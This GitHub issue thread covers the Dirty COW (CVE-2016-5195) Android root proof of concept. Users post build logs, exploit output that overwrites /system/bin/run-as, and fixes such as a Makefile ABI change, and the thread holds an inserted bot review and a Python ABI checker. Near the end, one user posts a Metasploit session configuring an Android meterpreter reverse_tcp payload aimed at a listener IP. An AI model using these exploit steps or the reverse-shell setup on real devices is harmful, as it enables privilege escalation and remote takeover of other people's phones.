timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

Exploit not working #7

Closed forced-request closed 7 years ago

forced-request commented 8 years ago

Hello, I've been trying to get this to work and am running into the following. It looks like it's not properly swapping out the run-as command, despite saying exploited.

$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
[100%] /data/local/tmp/dirtycow
adb push libs/armeabi/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
warning: new file size (13776) and file old size (14192) differ

size 14192

[*] mmap 0xf70b1000
[*] exploit (patch)
[*] currently 0xf70b1000=464c457f
[*] madvise = 0xf70b1000 14192
[*] madvise = 0 1048576
[*] /proc/self/mem -1048576 1048576
[*] exploited 0xf70b1000=464c457f
adb shell /system/bin/run-as
run-as: Usage:
    run-as <package-name> [--user <uid>] <command> [<args>]

timwr commented 8 years ago

@forced-request which device is this? I've found two devices so far where it doesn't work. One is an HTC Desire HD. The other is a friend's Nexus 5X (apparently the Nexus 6P too, ping @rhcp011235?). For every other device it works very quickly (e.g. the LOOP value can be as low as 1000).

forced-request commented 8 years ago

This is an HTC Nexus 9 running Marshmallow.

timwr commented 8 years ago

Ping @dirtycow

 _________________________________________
/ Linux version 2.6.35.10-g931a37e        \
| (htc-kernel@and18-2) (gcc version 4.4.0 |
| (GCC) ) #1 PREEMPT Wed Nov 9 14:04:03   |
\ CST 2011                                /
 -----------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

rhcp011235 commented 8 years ago

Working fine on my Nexus 6P running 7.1.1 but we are not getting a shell yet :) @Jcase said it's not hard, we just need to kill SELinux.

ghost commented 8 years ago

Works on Blu R1 HD... Run-as is not actually escalating anything... Just saying it did for the test. I want to know what can be changed to get root access, as this device is unrootable and unlockable as of OTA 6.6, and I hate the Amazon Prime offers lol

rhcp011235 commented 8 years ago

@dirtycow here to help us 👍🔥

dirtycow commented 8 years ago

Mooo

rhcp011235 commented 8 years ago

Here is a list of current POC code:

https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

Hope this helps maybe

parkerpeng commented 8 years ago

parker@ubuntu:~/workspace/CVE-2016-5195$ adb shell /system/bin/run-as
running as uid 2000
setresgid/setresuid failed
uid 2000

write succeed but setresgid/setresuid failed

parkerpeng commented 8 years ago

adb shell /system/bin/run-as
running as uid 2000
Could not set capabilities: Operation not permitted
setresgid/setresuid failed
uid 2000

Trudence commented 8 years ago

Same problem here, nexus 6P. Maybe the problem is related to this line: [*] /proc/self/mem -1048576 1048576

Any ideas?

MaxChinni commented 8 years ago

I can confirm that the exploit does not work on a Nexus 5X with the (at the moment) latest build (NBD90W).

timwr commented 8 years ago

I've tried the ptrace version of this exploit on my one non-vulnerable device (HTC Desire HD) and it's still unaffected. I'm not sure why as the kernel should be. @Trudence the 6P is vulnerable, this poc does not install su or disable SELinux. @MaxChinni I borrowed a 5X could not get the exploit to work. Perhaps you can try the ptrace version at https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs (although I suspect it won't be vulnerable either), I have no idea why. Any guesses?

Jtillburn commented 8 years ago

Thanks for posting the PoCs above. Should the procedure for executing these be similar to how dirtycow was executed?

MaxChinni commented 8 years ago

@timwr tried https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c, but the device hard reboots.

Is the code write(fd, p, mem_arg->patch_size) expected to return -1, as pointed out by @Trudence? errno translates it to I/O error.

noproto commented 8 years ago

Same here, Linux localhost 3.10.61-8865969 #1 SMP PREEMPT Fri Jul 29 22:37:31 KST 2016 aarch64. (Galaxy S6)

bkerler commented 8 years ago

Poc tested on several android 4.4 (LG L70, SGS S4) and android 7.0 (Nexus 5). Gets till exploited message, then kills adb connection. run-as uid running as 2000, not as uid 0. Maybe run-as isn't the best target to go after.

MaxChinni commented 8 years ago

OK, solved on the Nexus 5X. The device has a 64-bit architecture, so we need to use the arm64-v8a variant of the compiled binaries.

In my case

diff --git a/Makefile b/Makefile
index 19e09b8..1dd61c3 100644
--- a/Makefile
+++ b/Makefile
@@ -5,8 +5,8 @@ build:
    ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21

 push: build
-       adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
-       adb push libs/armeabi/run-as /data/local/tmp/run-as
+       adb push libs/arm64-v8a/dirtycow /data/local/tmp/dirtycow
+       adb push libs/arm64-v8a/run-as /data/local/tmp/run-as

 root: push
    adb shell 'chmod 777 /data/local/tmp/run-as'
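Review bot: the push target still hard-codes a single ABI directory (`libs/arm64-v8a/...`), so this change trades a 32-bit-only Makefile for a 64-bit-only one and will fail on the armeabi-v7a devices discussed earlier in this thread; consider deriving the directory from `adb shell getprop ro.product.cpu.abilist` (the command quoted just below) or exposing it as a Makefile variable such as `ABI ?= arm64-v8a` so the two `adb push` lines become `adb push libs/$(ABI)/dirtycow ...`. In the unchanged `root:` context, `chmod 777` makes the staged binary world-writable; 755 is all that is needed for it to execute.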

A good way to get device's abi could be

$ adb shell 'getprop ro.product.cpu.abilist'
arm64-v8a,armeabi-v7a,armeabi
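MaxChinni's fix hinged on matching the build's ABI to the device. The block below is an added example and not code from the timwr/CVE-2016-5195 project: a small Python check that reads the ELF identification header of any binary, maps it to the NDK ABI directory names used by this repository's Makefile, and compares it with the `ro.product.cpu.abilist` string, reporting whether the binary can run at all and whether it matches the device's preferred (first-listed) ABI. The sample headers and ABI lists are constructed, the function names are my own, and treating every 32-bit ARM image as both `armeabi` and `armeabi-v7a` is a simplification, since the ELF header alone does not distinguish the two.

```python
"""
Diagnose ABI mismatches between a built binary and an Android device.

Added example, not part of the CVE-2016-5195 PoC repository.  It parses
only the ELF identification bytes plus e_type/e_machine, which is enough
to tell a 32-bit ARM build from an arm64-v8a build, and checks the result
against the list printed by `adb shell getprop ro.product.cpu.abilist`.
"""
import struct

EI_NIDENT = 16
ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB = 1

# e_machine values from the ELF specification.
EM_386, EM_MIPS, EM_ARM, EM_X86_64, EM_AARCH64 = 3, 8, 40, 62, 183

# (EI_CLASS, e_machine) -> NDK ABI directory names that can run the image.
# Assumption/simplification: a 32-bit ARM header is accepted for both
# armeabi and armeabi-v7a, because the header alone cannot tell them apart.
ABI_BY_HEADER = {
    (ELFCLASS32, EM_386): {"x86"},
    (ELFCLASS64, EM_X86_64): {"x86_64"},
    (ELFCLASS32, EM_ARM): {"armeabi", "armeabi-v7a"},
    (ELFCLASS64, EM_AARCH64): {"arm64-v8a"},
    (ELFCLASS32, EM_MIPS): {"mips"},
    (ELFCLASS64, EM_MIPS): {"mips64"},
}


def elf_abis(data: bytes) -> set:
    """Return the ABI names compatible with the ELF image whose first bytes are `data`.

    Raises ValueError for anything that is not a little-endian ELF header
    with a class/machine pair known to the table above.
    """
    if len(data) < EI_NIDENT + 4 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_data != ELFDATA2LSB:
        raise ValueError("only little-endian ELF is handled here")
    # e_type (2 bytes) and e_machine (2 bytes) immediately follow e_ident.
    _e_type, e_machine = struct.unpack_from("<HH", data, EI_NIDENT)
    try:
        return set(ABI_BY_HEADER[(ei_class, e_machine)])
    except KeyError:
        raise ValueError(f"unknown class/machine pair {ei_class}/{e_machine}")


def parse_abilist(getprop_output: str) -> list:
    """Split 'arm64-v8a,armeabi-v7a,armeabi' into a list, preferred ABI first."""
    return [a.strip() for a in getprop_output.strip().split(",") if a.strip()]


def pick_abi(data: bytes, getprop_output: str):
    """Most-preferred device ABI under which the binary can run, or None if none fits."""
    supported = elf_abis(data)
    for abi in parse_abilist(getprop_output):
        if abi in supported:
            return abi
    return None


def matches_preferred(data: bytes, getprop_output: str) -> bool:
    """True only if the binary matches the device's first-listed (preferred) ABI.

    A 32-bit build on a 64-bit device returns False here even though it would
    execute, which is exactly the situation this thread ran into.
    """
    abilist = parse_abilist(getprop_output)
    return bool(abilist) and abilist[0] in elf_abis(data)


def fake_elf_header(ei_class: int, e_machine: int) -> bytes:
    """Constructed minimal header: magic, class, LSB, version, padding, e_type, e_machine."""
    ident = b"\x7fELF" + bytes([ei_class, ELFDATA2LSB, 1]) + b"\x00" * 9
    return ident + struct.pack("<HH", 2, e_machine)  # e_type = ET_EXEC


if __name__ == "__main__":
    # Constructed inputs: the abilist MaxChinni reports for the Nexus 5X and
    # fake headers standing in for three of the Makefile's build variants.
    # For a real file use: elf_abis(open(path, "rb").read(EI_NIDENT + 4))
    nexus5x = "arm64-v8a,armeabi-v7a,armeabi"
    builds = (
        ("arm64-v8a build", fake_elf_header(ELFCLASS64, EM_AARCH64)),
        ("armeabi build", fake_elf_header(ELFCLASS32, EM_ARM)),
        ("x86_64 build", fake_elf_header(ELFCLASS64, EM_X86_64)),
    )
    for name, hdr in builds:
        print(f"{name}: runs as {pick_abi(hdr, nexus5x)}, "
              f"preferred ABI match: {matches_preferred(hdr, nexus5x)}")
```

Run against a real binary, the same check explains the later "not executable: 64-bit ELF file" report in this thread: an arm64-v8a header against an abilist of just `armeabi-v7a` yields no usable ABI at all.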

lucasa831 commented 8 years ago

got the same as op here

Trudence commented 8 years ago

Yes, solved it for me too

Chrisplus commented 8 years ago

Not working on Samsung galaxy nexus either (using armeabi-v7a and armeabi )

Processor : ARMv7 Processor rev 10 (v7l)
processor : 0
BogoMIPS : 597.12

MaxChinni commented 8 years ago

@Chrisplus I tried on a Galaxy Nexus and I experience the same behaviour: it fails.

The ABI should be armeabi-v7a

$ adb shell getprop ro.product.cpu.abi
armeabi-v7a

Here's my output:

adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
warning: new file size (13784) and file old size (9500) differ

size 13784

[*] mmap 0x40204000
[*] exploit (patch)
[*] currently 0x40204000=464c457f
[*] madvise = 0x40204000 13784
[*] /proc/self/mem -1048576 1048576
[*] madvise = 0 1048576
[*] exploited 0x40204000=464c457f
adb shell /system/bin/run-as
Usage: run-as <package-name> <command> [<args>]

I suspect the problem is still related to

[*] /proc/self/mem -1048576 1048576

ghost commented 8 years ago

result on Alcatel One Touch Pop S3 (5050X):

Could not set capabilities: Operation not permitted setresgid/setresuid failed

BsnNick commented 8 years ago

@pnebert Same error on my Verizon SnapDragon Galaxy S7 Edge.

leoforney commented 8 years ago

Same issue on an unidentified LG Prepaid phone with armv7 rev 1

basti-schr commented 8 years ago

Now I get this message:

[*] mmap 0x7fa69e1000
[*] exploit (patch)
[*] currently 0x7fa69e1000=10102464c457f
[*] madvise = 0x7fa69e1000 13864
[*] madvise = 0 1048576
[*] /proc/self/mem 1652555776 1048576
[*] exploited 0x7fa69e1000=10102464c457f
adb shell /system/bin/run-as

WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x6f0
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x1

running as uid 2000 uid 0

what is it?

rootbdfy commented 8 years ago

WARNING: linker: run-as: unused DT entry: type 0x6ffffffe arg 0x690
WARNING: linker: run-as: unused DT entry: type 0x6fffffff arg 0x1

Same problem on meizu m2 note (arm64-v8a)

timwr commented 8 years ago

You can safely ignore those warnings, or remove them with this: https://github.com/kost/android-elf-cleaner

basti-schr commented 8 years ago

Reboot your phone! This was the solution working for me.. :smile: @rootbdfy @timwr

refi64 commented 8 years ago

@basti-schr But that just un-does the exploit...

basti-schr commented 8 years ago

OK, that is good to know. Because my problem is that I have a 64-bit device and the elf-cleaner does not work with it.

shell@phone:/data/local/tmp $ ./android-elf-cleaner
/system/bin/sh: ./android-elf-cleaner: not executable: 64-bit ELF file

rootbdfy commented 8 years ago

@timwr @basti-schr android-elf-cleaner worked for me, but run-as still not work :

shell@m2note:/data/local/tmp $ ./dirtycow /system/bin/run-as run-as
warning: new file size (5816) and file old size (13864) differ

size 13864

[*] mmap 0x7f9f239000
[*] exploit (patch)
[*] currently 0x7f9f239000=10102464c457f
[*] madvise = 0x7f9f239000 13864
[*] madvise = 0 1048576
[*] /proc/self/mem 1652555776 1048576
[*] exploited 0x7f9f239000=10102464c457f

shell@m2note:/data/local/tmp $ run-as
running as uid 2000
uid 0
shell@m2note:/data/local/tmp $ run-as su
running as uid 2000
uid 0
shell@m2note:/data/local/tmp $ run-as blabla
running as uid 2000
uid 0
shell@m2note:/data/local/tmp $ run-as blabla blablabla
running as uid 2000
uid 0

GurdZain commented 7 years ago

adb shell /system/bin/run-as running as uid 2000 uid 2000

I have replaced the run-as.. Does uid 2000 mean failure?

@timwr

droidvoider commented 7 years ago

Anyone find a solution for this problem yet?

2|shell@noblelteatt:/system/bin $ run-as run-as uid run-as 2000 setresgid/setresuid failed uid 2000 0 u:r:runas:s0 context 0 u:r:shell:s0 shell@noblelteatt:/system/bin

@timwr, thank you so much for your contributions; you are off the hook amazing! I learned so much from this already.

abassolhy commented 5 years ago

My problem is:

msf > use exploit/android/fileformat/adobe_reader_pdf_js_interface
msf exploit(adobe_reader_pdf_js_interface) > set -p android/meterpreter/reverse_tcp
-p => android/meterpreter/reverse_tcp
msf exploit(adobe_reader_pdf_js_interface) > set lhost 100.77.94.142
lhost => 100.77.94.142
msf exploit(adobe_reader_pdf_js_interface) > set lport 4444
lport => 4444
msf exploit(adobe_reader_pdf_js_interface) > exploit

[*] Generating Javascript exploit... ([-] Exploit failed: RuntimeError android/libs/armeabi/libndkstager.so not found)

abassolhy commented 5 years ago

What problem? Exploit failed: RuntimeError android/libs/armeabi/libndkstager.so not found